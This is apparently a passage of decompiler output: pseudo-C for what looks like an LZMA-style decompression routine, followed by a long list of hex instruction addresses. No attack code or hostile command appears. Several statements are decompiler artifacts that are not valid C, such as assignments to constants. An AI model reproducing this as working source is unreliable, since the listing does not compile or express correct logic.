                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												_t469 = __ebp - 0x58;
                                                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                        												__eflags =  *_t469;
                                                                        												 *(__ebp - 0x30) = 0x10;
                                                                        												 *(__ebp - 0x40) = 8;
                                                                        												goto L144;
                                                                        											}
                                                                        											__eax =  *(__ebp - 0x4c);
                                                                        											__ecx =  *(__ebp - 0x58);
                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                        											 *(__ebp - 0x30) = 8;
                                                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                        											goto L130;
                                                                        										case 0x14:
                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                        											__eax =  *(__ebp - 0x80);
                                                                        											L140:
                                                                        											 *(_t612 - 0x88) = _t533;
                                                                        											goto L1;
                                                                        										case 0x15:
                                                                        											__eax = 0;
                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        											__al = __al & 0x000000fd;
                                                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                        											goto L121;
                                                                        										case 0x16:
                                                                        											__eax =  *(__ebp - 0x30);
                                                                        											__eflags = __eax - 4;
                                                                        											if(__eax >= 4) {
                                                                        												_push(3);
                                                                        												_pop(__eax);
                                                                        											}
                                                                        											__ecx =  *(__ebp - 4);
                                                                        											 *(__ebp - 0x40) = 6;
                                                                        											__eax = __eax << 7;
                                                                        											 *(__ebp - 0x7c) = 0x19;
                                                                        											 *(__ebp - 0x58) = __eax;
                                                                        											goto L145;
                                                                        										case 0x17:
                                                                        											goto L145;
                                                                        										case 0x18:
                                                                        											L146:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0x18;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t484 = __ebp - 0x70;
                                                                        											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t484;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											L148:
                                                                        											_t487 = __ebp - 0x48;
                                                                        											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                        											__eflags =  *_t487;
                                                                        											goto L149;
                                                                        										case 0x19:
                                                                        											__eflags = __ebx - 4;
                                                                        											if(__ebx < 4) {
                                                                        												 *(__ebp - 0x2c) = __ebx;
                                                                        												L120:
                                                                        												_t394 = __ebp - 0x2c;
                                                                        												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                        												__eflags =  *_t394;
                                                                        												L121:
                                                                        												__eax =  *(__ebp - 0x2c);
                                                                        												__eflags = __eax;
                                                                        												if(__eax == 0) {
                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                        													goto L170;
                                                                        												}
                                                                        												__eflags = __eax -  *(__ebp - 0x60);
                                                                        												if(__eax >  *(__ebp - 0x60)) {
                                                                        													goto L171;
                                                                        												}
                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                        												__eax =  *(__ebp - 0x30);
                                                                        												_t401 = __ebp - 0x60;
                                                                        												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                        												__eflags =  *_t401;
                                                                        												goto L124;
                                                                        											}
                                                                        											__ecx = __ebx;
                                                                        											__eax = __ebx;
                                                                        											__ecx = __ebx >> 1;
                                                                        											__eax = __ebx & 0x00000001;
                                                                        											__ecx = (__ebx >> 1) - 1;
                                                                        											__al = __al | 0x00000002;
                                                                        											__eax = (__ebx & 0x00000001) << __cl;
                                                                        											__eflags = __ebx - 0xe;
                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                        											if(__ebx >= 0xe) {
                                                                        												__ebx = 0;
                                                                        												 *(__ebp - 0x48) = __ecx;
                                                                        												L103:
                                                                        												__eflags =  *(__ebp - 0x48);
                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                        													__eax = __eax + __ebx;
                                                                        													 *(__ebp - 0x40) = 4;
                                                                        													 *(__ebp - 0x2c) = __eax;
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__eax =  *(__ebp - 4) + 0x644;
                                                                        													__eflags = __eax;
                                                                        													L109:
                                                                        													__ebx = 0;
                                                                        													 *(__ebp - 0x58) = __eax;
                                                                        													 *(__ebp - 0x50) = 1;
                                                                        													 *(__ebp - 0x44) = 0;
                                                                        													 *(__ebp - 0x48) = 0;
                                                                        													L113:
                                                                        													__eax =  *(__ebp - 0x40);
                                                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                        														_t392 = __ebp - 0x2c;
                                                                        														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                        														__eflags =  *_t392;
                                                                        														goto L120;
                                                                        													}
                                                                        													__eax =  *(__ebp - 0x50);
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        													__eax =  *(__ebp - 0x58);
                                                                        													__esi = __edi + __eax;
                                                                        													 *(__ebp - 0x54) = __esi;
                                                                        													__ax =  *__esi;
                                                                        													__ecx = __ax & 0x0000ffff;
                                                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                                                        													if( *(__ebp - 0xc) >= __edx) {
                                                                        														__ecx = 0;
                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                        														__ecx = 1;
                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                        														__ebx = 1;
                                                                        														__ecx =  *(__ebp - 0x48);
                                                                        														__ebx = 1 << __cl;
                                                                        														__ecx = 1 << __cl;
                                                                        														__ebx =  *(__ebp - 0x44);
                                                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                        														__cx = __ax;
                                                                        														__cx = __ax >> 5;
                                                                        														__eax = __eax - __ecx;
                                                                        														__edi = __edi + 1;
                                                                        														__eflags = __edi;
                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                        														 *__esi = __ax;
                                                                        														 *(__ebp - 0x50) = __edi;
                                                                        													} else {
                                                                        														 *(__ebp - 0x10) = __edx;
                                                                        														0x800 = 0x800 - __ecx;
                                                                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        														 *__esi = __dx;
                                                                        													}
                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        														L112:
                                                                        														_t369 = __ebp - 0x48;
                                                                        														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                        														__eflags =  *_t369;
                                                                        														goto L113;
                                                                        													} else {
                                                                        														goto L110;
                                                                        													}
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0xc);
                                                                        												__ebx = __ebx + __ebx;
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                        													__ecx =  *(__ebp - 0x10);
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        													__ebx = __ebx | 0x00000001;
                                                                        													__eflags = __ebx;
                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													L102:
                                                                        													_t339 = __ebp - 0x48;
                                                                        													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                        													__eflags =  *_t339;
                                                                        													goto L103;
                                                                        												} else {
                                                                        													goto L100;
                                                                        												}
                                                                        											}
                                                                        											__edx =  *(__ebp - 4);
                                                                        											__eax = __eax - __ebx;
                                                                        											 *(__ebp - 0x40) = __ecx;
                                                                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                        											goto L109;
                                                                        										case 0x1a:
                                                                        											L56:
                                                                        											__eflags =  *(__ebp - 0x64);
                                                                        											if( *(__ebp - 0x64) == 0) {
                                                                        												 *(__ebp - 0x88) = 0x1a;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x68);
                                                                        											__al =  *(__ebp - 0x5c);
                                                                        											__edx =  *(__ebp - 8);
                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        											 *( *(__ebp - 0x68)) = __al;
                                                                        											__ecx =  *(__ebp - 0x14);
                                                                        											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                        											__eax = __ecx + 1;
                                                                        											__edx = 0;
                                                                        											_t192 = __eax %  *(__ebp - 0x74);
                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                        											__edx = _t192;
                                                                        											goto L80;
                                                                        										case 0x1b:
                                                                        											L76:
                                                                        											__eflags =  *(__ebp - 0x64);
                                                                        											if( *(__ebp - 0x64) == 0) {
                                                                        												 *(__ebp - 0x88) = 0x1b;
                                                                        												goto L170;
                                                                        											}
                                                                        											__eax =  *(__ebp - 0x14);
                                                                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        											__eflags = __eax -  *(__ebp - 0x74);
                                                                        											if(__eax >=  *(__ebp - 0x74)) {
                                                                        												__eax = __eax +  *(__ebp - 0x74);
                                                                        												__eflags = __eax;
                                                                        											}
                                                                        											__edx =  *(__ebp - 8);
                                                                        											__cl =  *(__eax + __edx);
                                                                        											__eax =  *(__ebp - 0x14);
                                                                        											 *(__ebp - 0x5c) = __cl;
                                                                        											 *(__eax + __edx) = __cl;
                                                                        											__eax = __eax + 1;
                                                                        											__edx = 0;
                                                                        											_t275 = __eax %  *(__ebp - 0x74);
                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                        											__edx = _t275;
                                                                        											__eax =  *(__ebp - 0x68);
                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        											_t284 = __ebp - 0x64;
                                                                        											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                        											__eflags =  *_t284;
                                                                        											 *( *(__ebp - 0x68)) = __cl;
                                                                        											L80:
                                                                        											 *(__ebp - 0x14) = __edx;
                                                                        											goto L81;
                                                                        										case 0x1c:
                                                                        											while(1) {
                                                                        												L124:
                                                                        												__eflags =  *(__ebp - 0x64);
                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                        													break;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                        													__eflags = __eax;
                                                                        												}
                                                                        												__edx =  *(__ebp - 8);
                                                                        												__cl =  *(__eax + __edx);
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                        												 *(__eax + __edx) = __cl;
                                                                        												__eax = __eax + 1;
                                                                        												__edx = 0;
                                                                        												_t415 = __eax %  *(__ebp - 0x74);
                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                        												__edx = _t415;
                                                                        												__eax =  *(__ebp - 0x68);
                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                        												__eflags =  *(__ebp - 0x30);
                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                        												 *(__ebp - 0x14) = _t415;
                                                                        												if( *(__ebp - 0x30) > 0) {
                                                                        													continue;
                                                                        												} else {
                                                                        													L81:
                                                                        													 *(__ebp - 0x88) = 2;
                                                                        													goto L1;
                                                                        												}
                                                                        											}
                                                                        											 *(__ebp - 0x88) = 0x1c;
                                                                        											L170:
                                                                        											_push(0x22);
                                                                        											_pop(_t567);
                                                                        											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                        											_t535 = 0;
                                                                        											L172:
                                                                        											return _t535;
                                                                        									}
                                                                        								}
                                                                        								L171:
                                                                        								_t535 = _t534 | 0xffffffff;
                                                                        								goto L172;
                                                                        							}
                                                                        						}
                                                                        						__eax =  *(__ebp - 0x50);
                                                                        						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        						__eax =  *(__ebp - 0x58);
                                                                        						__esi = __edx + __eax;
                                                                        						 *(__ebp - 0x54) = __esi;
                                                                        						__ax =  *__esi;
                                                                        						__edi = __ax & 0x0000ffff;
                                                                        						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        						if( *(__ebp - 0xc) >= __ecx) {
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        							__cx = __ax;
                                                                        							__cx = __ax >> 5;
                                                                        							__eax = __eax - __ecx;
                                                                        							__edx = __edx + 1;
                                                                        							 *__esi = __ax;
                                                                        							 *(__ebp - 0x50) = __edx;
                                                                        						} else {
                                                                        							 *(__ebp - 0x10) = __ecx;
                                                                        							0x800 = 0x800 - __edi;
                                                                        							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        							 *__esi = __cx;
                                                                        						}
                                                                        						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        							goto L148;
                                                                        						} else {
                                                                        							goto L146;
                                                                        						}
                                                                        					}
                                                                        					goto L1;
                                                                        				}
                                                                        			}








                                                                        0x00000000
                                                                        0x00407395
                                                                        0x00407395
                                                                        0x00407399
                                                                        0x004073be
                                                                        0x004073c8
                                                                        0x00000000
                                                                        0x0040739b
                                                                        0x0040739b
                                                                        0x0040739e
                                                                        0x004073a2
                                                                        0x004073a5
                                                                        0x004073a8
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073af
                                                                        0x00407489
                                                                        0x00407489
                                                                        0x00407490
                                                                        0x00407490
                                                                        0x00407493
                                                                        0x0040749a
                                                                        0x004074c7
                                                                        0x004074cb
                                                                        0x0040752b
                                                                        0x0040752e
                                                                        0x00407533
                                                                        0x00407534
                                                                        0x00407536
                                                                        0x00407538
                                                                        0x0040753b
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406bec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x00000000
                                                                        0x00406bfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c06
                                                                        0x00406c09
                                                                        0x00406c0c
                                                                        0x00406c10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c16
                                                                        0x00406c19
                                                                        0x00406c1b
                                                                        0x00406c1c
                                                                        0x00406c1f
                                                                        0x00406c21
                                                                        0x00406c22
                                                                        0x00406c24
                                                                        0x00406c27
                                                                        0x00406c2c
                                                                        0x00406c31
                                                                        0x00406c3a
                                                                        0x00406c4d
                                                                        0x00406c50
                                                                        0x00406c5c
                                                                        0x00406c84
                                                                        0x00406c86
                                                                        0x00406c94
                                                                        0x00406c94
                                                                        0x00406c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c88
                                                                        0x00406c8b
                                                                        0x00406c8c
                                                                        0x00406c8c
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c62
                                                                        0x00406c67
                                                                        0x00406c67
                                                                        0x00406c70
                                                                        0x00406c78
                                                                        0x00406c7b
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c9e
                                                                        0x00406c9e
                                                                        0x00406ca2
                                                                        0x0040754e
                                                                        0x00000000
                                                                        0x0040754e
                                                                        0x00406cab
                                                                        0x00406cbb
                                                                        0x00406cbe
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc4
                                                                        0x00406cc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406cca
                                                                        0x00406cd0
                                                                        0x00406cfa
                                                                        0x00406d00
                                                                        0x00406d07
                                                                        0x00000000
                                                                        0x00406d07
                                                                        0x00406cd6
                                                                        0x00406cd9
                                                                        0x00406cde
                                                                        0x00406cde
                                                                        0x00406ce9
                                                                        0x00406cf1
                                                                        0x00406cf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d39
                                                                        0x00406d3f
                                                                        0x00406d42
                                                                        0x00406d4f
                                                                        0x00406d57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d0e
                                                                        0x00406d0e
                                                                        0x00406d12
                                                                        0x0040755d
                                                                        0x00000000
                                                                        0x0040755d
                                                                        0x00406d1e
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d2c
                                                                        0x00406d2f
                                                                        0x00406d32
                                                                        0x00406d37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x0040741a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040741c
                                                                        0x00407420
                                                                        0x004075cf
                                                                        0x00000000
                                                                        0x004075cf
                                                                        0x0040742c
                                                                        0x00407433
                                                                        0x0040743b
                                                                        0x0040743e
                                                                        0x00407441
                                                                        0x00407441
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d5f
                                                                        0x00406d61
                                                                        0x00406d64
                                                                        0x00406dd5
                                                                        0x00406dd8
                                                                        0x00406ddb
                                                                        0x00406de2
                                                                        0x00406dec
                                                                        0x00000000
                                                                        0x00406dec
                                                                        0x00406d66
                                                                        0x00406d6a
                                                                        0x00406d6d
                                                                        0x00406d6f
                                                                        0x00406d72
                                                                        0x00406d75
                                                                        0x00406d77
                                                                        0x00406d7a
                                                                        0x00406d7c
                                                                        0x00406d81
                                                                        0x00406d84
                                                                        0x00406d87
                                                                        0x00406d8b
                                                                        0x00406d92
                                                                        0x00406d95
                                                                        0x00406d9c
                                                                        0x00406da0
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406dac
                                                                        0x00406daf
                                                                        0x00406dcd
                                                                        0x00406dcf
                                                                        0x00000000
                                                                        0x00406db1
                                                                        0x00406db1
                                                                        0x00406db4
                                                                        0x00406db7
                                                                        0x00406dba
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbf
                                                                        0x00406dc2
                                                                        0x00406dc4
                                                                        0x00406dc5
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00406ffe
                                                                        0x00407002
                                                                        0x00407020
                                                                        0x00407023
                                                                        0x0040702a
                                                                        0x0040702d
                                                                        0x00407030
                                                                        0x00407033
                                                                        0x00407036
                                                                        0x00407039
                                                                        0x0040703b
                                                                        0x00407042
                                                                        0x00407043
                                                                        0x00407045
                                                                        0x00407048
                                                                        0x0040704b
                                                                        0x0040704e
                                                                        0x0040704e
                                                                        0x00407053
                                                                        0x00000000
                                                                        0x00407053
                                                                        0x00407004
                                                                        0x00407007
                                                                        0x0040700a
                                                                        0x00407014
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407068
                                                                        0x0040706c
                                                                        0x0040708f
                                                                        0x00407092
                                                                        0x00407095
                                                                        0x0040709f
                                                                        0x0040706e
                                                                        0x0040706e
                                                                        0x00407071
                                                                        0x00407074
                                                                        0x00407077
                                                                        0x00407084
                                                                        0x00407087
                                                                        0x00407087
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070ab
                                                                        0x004070af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070b5
                                                                        0x004070b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070bf
                                                                        0x004070c1
                                                                        0x004070c5
                                                                        0x004070c5
                                                                        0x004070c8
                                                                        0x004070cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040711c
                                                                        0x00407120
                                                                        0x00407127
                                                                        0x0040712a
                                                                        0x0040712d
                                                                        0x00407137
                                                                        0x00000000
                                                                        0x00407137
                                                                        0x00407122
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407143
                                                                        0x00407147
                                                                        0x0040714e
                                                                        0x00407151
                                                                        0x00407154
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407157
                                                                        0x0040715a
                                                                        0x0040715d
                                                                        0x0040715d
                                                                        0x00407160
                                                                        0x00407163
                                                                        0x00407166
                                                                        0x00407166
                                                                        0x00407169
                                                                        0x00407170
                                                                        0x00407175
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407203
                                                                        0x00407203
                                                                        0x00407207
                                                                        0x004075a5
                                                                        0x00000000
                                                                        0x004075a5
                                                                        0x0040720d
                                                                        0x00407210
                                                                        0x00407213
                                                                        0x00407217
                                                                        0x0040721a
                                                                        0x00407220
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407225
                                                                        0x00407228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406df8
                                                                        0x00406df8
                                                                        0x00406dfc
                                                                        0x00407569
                                                                        0x00000000
                                                                        0x00407569
                                                                        0x00406e02
                                                                        0x00406e05
                                                                        0x00406e08
                                                                        0x00406e0c
                                                                        0x00406e0f
                                                                        0x00406e15
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e1a
                                                                        0x00406e1d
                                                                        0x00406e1d
                                                                        0x00406e20
                                                                        0x00406e23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e29
                                                                        0x00406e2f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e35
                                                                        0x00406e35
                                                                        0x00406e39
                                                                        0x00406e3c
                                                                        0x00406e3f
                                                                        0x00406e42
                                                                        0x00406e45
                                                                        0x00406e46
                                                                        0x00406e49
                                                                        0x00406e4b
                                                                        0x00406e51
                                                                        0x00406e54
                                                                        0x00406e57
                                                                        0x00406e5a
                                                                        0x00406e5d
                                                                        0x00406e60
                                                                        0x00406e63
                                                                        0x00406e7f
                                                                        0x00406e82
                                                                        0x00406e85
                                                                        0x00406e88
                                                                        0x00406e8f
                                                                        0x00406e93
                                                                        0x00406e95
                                                                        0x00406e99
                                                                        0x00406e65
                                                                        0x00406e65
                                                                        0x00406e69
                                                                        0x00406e71
                                                                        0x00406e76
                                                                        0x00406e78
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406e9c
                                                                        0x00406ea3
                                                                        0x00406ea6
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eb1
                                                                        0x00406eb1
                                                                        0x00406eb5
                                                                        0x00407575
                                                                        0x00000000
                                                                        0x00407575
                                                                        0x00406ebb
                                                                        0x00406ebe
                                                                        0x00406ec1
                                                                        0x00406ec5
                                                                        0x00406ec8
                                                                        0x00406ece
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed3
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406edc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ede
                                                                        0x00406ee1
                                                                        0x00406ee4
                                                                        0x00406ee7
                                                                        0x00406eea
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef3
                                                                        0x00406ef6
                                                                        0x00406ef9
                                                                        0x00406efc
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1d
                                                                        0x00406f1d
                                                                        0x00406f20
                                                                        0x00406f24
                                                                        0x00406f26
                                                                        0x00406efe
                                                                        0x00406efe
                                                                        0x00406f06
                                                                        0x00406f0b
                                                                        0x00406f0d
                                                                        0x00406f0f
                                                                        0x00406f0f
                                                                        0x00406f29
                                                                        0x00406f30
                                                                        0x00406f33
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00406f33
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f75
                                                                        0x00406f75
                                                                        0x00406f79
                                                                        0x00407581
                                                                        0x00000000
                                                                        0x00407581
                                                                        0x00406f7f
                                                                        0x00406f82
                                                                        0x00406f85
                                                                        0x00406f89
                                                                        0x00406f8c
                                                                        0x00406f92
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f97
                                                                        0x00406f9a
                                                                        0x00406f9a
                                                                        0x00406fa0
                                                                        0x00406f3e
                                                                        0x00406f3e
                                                                        0x00406f41
                                                                        0x00000000
                                                                        0x00406f41
                                                                        0x00406fa2
                                                                        0x00406fa2
                                                                        0x00406fa5
                                                                        0x00406fa8
                                                                        0x00406fab
                                                                        0x00406fae
                                                                        0x00406fb1
                                                                        0x00406fb4
                                                                        0x00406fb7
                                                                        0x00406fba
                                                                        0x00406fbd
                                                                        0x00406fc0
                                                                        0x00406fd8
                                                                        0x00406fdb
                                                                        0x00406fde
                                                                        0x00406fe1
                                                                        0x00406fe1
                                                                        0x00406fe4
                                                                        0x00406fe8
                                                                        0x00406fea
                                                                        0x00406fc2
                                                                        0x00406fc2
                                                                        0x00406fca
                                                                        0x00406fcf
                                                                        0x00406fd1
                                                                        0x00406fd3
                                                                        0x00406fd3
                                                                        0x00406fed
                                                                        0x00406ff4
                                                                        0x00406ff7
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00407286
                                                                        0x00407286
                                                                        0x0040728a
                                                                        0x004075b1
                                                                        0x00000000
                                                                        0x004075b1
                                                                        0x00407290
                                                                        0x00407293
                                                                        0x00407296
                                                                        0x0040729a
                                                                        0x0040729d
                                                                        0x004072a3
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407056
                                                                        0x00407056
                                                                        0x00407059
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407452
                                                                        0x00407456
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x0040747b
                                                                        0x00407482
                                                                        0x00000000
                                                                        0x00407482
                                                                        0x00407458
                                                                        0x0040745b
                                                                        0x0040745e
                                                                        0x00407461
                                                                        0x00407468
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407543
                                                                        0x00407546
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717d
                                                                        0x0040717f
                                                                        0x00407186
                                                                        0x00407187
                                                                        0x00407189
                                                                        0x0040718c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407194
                                                                        0x00407197
                                                                        0x0040719a
                                                                        0x0040719c
                                                                        0x0040719e
                                                                        0x0040719e
                                                                        0x0040719f
                                                                        0x004071a2
                                                                        0x004071a9
                                                                        0x004071ac
                                                                        0x004071ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040749f
                                                                        0x0040749f
                                                                        0x004074a3
                                                                        0x004075db
                                                                        0x00000000
                                                                        0x004075db
